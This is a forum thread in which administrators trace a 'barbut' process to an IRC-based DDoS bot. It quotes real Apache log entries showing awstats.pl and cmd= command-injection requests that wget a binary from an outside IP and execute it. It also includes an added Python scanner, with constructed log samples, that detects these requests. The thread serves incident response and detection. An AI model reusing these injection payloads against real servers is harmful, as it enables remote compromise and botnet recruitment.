Re: barbut process using 100% cpu and connecting

krzysiek wrote:

> > there was a process called "barbut" (2 of them) using 49,2% CPU time
> > each :O
> > meanwhile netstat showed established connections to 195.73.177.146:666
> > + several waiting.
> Some host in .nl.
> > I have no idea where this process came from. Any clues?
> I don't know about you, but I would take the machine off the net and
> try to understand what happened.

I hope the original poster did that - here's the "barbut" occurrence in our apache log:

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut; echo| HTTP/1.1

(there are four attempts, trying different paths to awstats.pl)

I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as 'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

Googling for some of those names finds this is probably the source code:

formatting link

The comments start:

"This is a IRC based distributed denial of service client. It connects to the server specified below and accepts commands via the channel specified."

Hope this was useful, A.

Reply to
A

I've found similar requests in yesterday's log (19/Nov/2007:20:02:53 +0100):

"GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget formatting link barbut.c -o barbut;./ barbut ; HTTP/1.1"

W.r.t. the sources mentioned above, barbut.c has been changed, including the following differences:

  • The CHAN (channel to join) changed from "#whatever" to "#whatever1"
  • The server list has been replaced by the single entry "217.79.176.126"
  • The initial connection port has changed from 6667 to 113
  • The "run command" macro has changed from "SH " to "ZK "
  • The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE %s +iwx"

That apparently didn't succeed, so I don't know who the victims are...

Reply to
ale2007
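Both posts above found the attack the same way: an Apache access-log entry whose query string carries a shell pipeline (a `configdir=|...` value aimed at awstats.pl in the first case, a bare `cmd=...` parameter in the second). The script below is an added example, not code from this thread or from AWStats, that scans access-log lines for exactly those two shapes and pulls out the download host and file the request tries to fetch. The log lines it runs on are constructed: the request strings follow the two patterns quoted above (for the second one the download URL and the `gcc` step are assumptions, since the post does not show them), and the client IPs, timestamps, sizes and user agents are made up. The last sample line is a normal AWStats request and must not be flagged.

```python
"""Scan Apache access-log lines for the command-injection requests seen in
this thread and extract indicators (download target, injected command).
Added example; the sample log below is constructed, not taken from the thread."""
import re
from urllib.parse import unquote

# Constructed sample in Apache combined-log format. Lines 1-2: the awstats.pl
# configdir pattern from the thread. Line 3: the "cmd=" pattern from the second
# post (download URL and gcc step are assumed). Line 4: a benign request.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Nov/2007:20:02:53 +0100] "GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;%20echo| HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [19/Nov/2007:20:02:54 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;%20echo| HTTP/1.1" 404 290 "-" "Mozilla/4.0"
203.0.113.9 - - [19/Nov/2007:20:05:11 +0100] "GET /?=?&cmd=cd%20/tmp;killall%20-9%20barbut;rm%20-f%20barbut.c;rm%20-f%20barbut;wget%20217.79.176.126/barbut.c;gcc%20barbut.c%20-o%20barbut;./barbut HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
192.0.2.4 - - [19/Nov/2007:20:10:00 +0100] "GET /awstats/awstats.pl?config=example.org&lang=en HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# Client, timestamp, request target and status from a combined-log line.
# The target is matched non-greedily up to " HTTP/x.y" so a raw space inside
# the attacker's request (as in the thread's "; echo|") does not break parsing.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Shell commands that have no business inside a query-string value; each must
# sit at the start of the value or right after a shell separator.
SHELL_RE = re.compile(r'(?:^|[;|&`\s])(?:cd|wget|curl|chmod|killall|gcc|rm)\s', re.I)
# Download target of a wget, stopping at the next shell separator.
WGET_RE = re.compile(r'\bwget\s+(?:-\S+\s+)*(?:https?://)?([^\s;|&]+)', re.I)


def split_query(target):
    """Split a request target into (path, [(key, decoded value), ...]).

    Splits on '&' only. urllib's parse_qsl may also split on ';', which would
    cut an injected pipeline such as 'cd /tmp;wget ...' into harmless pieces.
    """
    path, _, query = target.partition('?')
    params = []
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.append((unquote(key), unquote(value)))
    return path, params


def classify_params(path, params):
    """Return (reason, value) for the first suspicious parameter, else None."""
    for key, value in params:
        # awstats.pl configdir whose value starts with '|' (the first post's pattern)
        if path.endswith('awstats.pl') and key == 'configdir' and value.lstrip().startswith('|'):
            return 'awstats configdir pipe injection', value
        # any parameter carrying a shell pipeline (the second post's pattern)
        if SHELL_RE.search(value):
            return 'shell commands in parameter %r' % key, value
    return None


def scan_log(text):
    """Return one finding dict per suspicious request line in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = split_query(m.group('target'))
        hit = classify_params(path, params)
        if hit is None:
            continue
        reason, value = hit
        findings.append({
            'client': m.group('client'),
            'time': m.group('time'),
            'path': path,
            'status': int(m.group('status')),
            'reason': reason,
            'downloads': WGET_RE.findall(value),   # hosts/files the box was told to fetch
            'command': value,
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print('%(time)s %(client)s %(path)s -> %(reason)s; fetches %(downloads)s (HTTP %(status)d)' % f)
```

The HTTP status in each finding matters when triaging: a 404 (the wrong awstats.pl path, as in "four attempts, trying different paths") never reached the script, while a 200 on the right path means the pipeline was probably run and the host should be treated as compromised, exactly as krzysiek advised.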

I found the same connection to my Imail server and Sophos posted this a few minutes ago.

formatting link

Reply to
Peder.Rovelstad

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.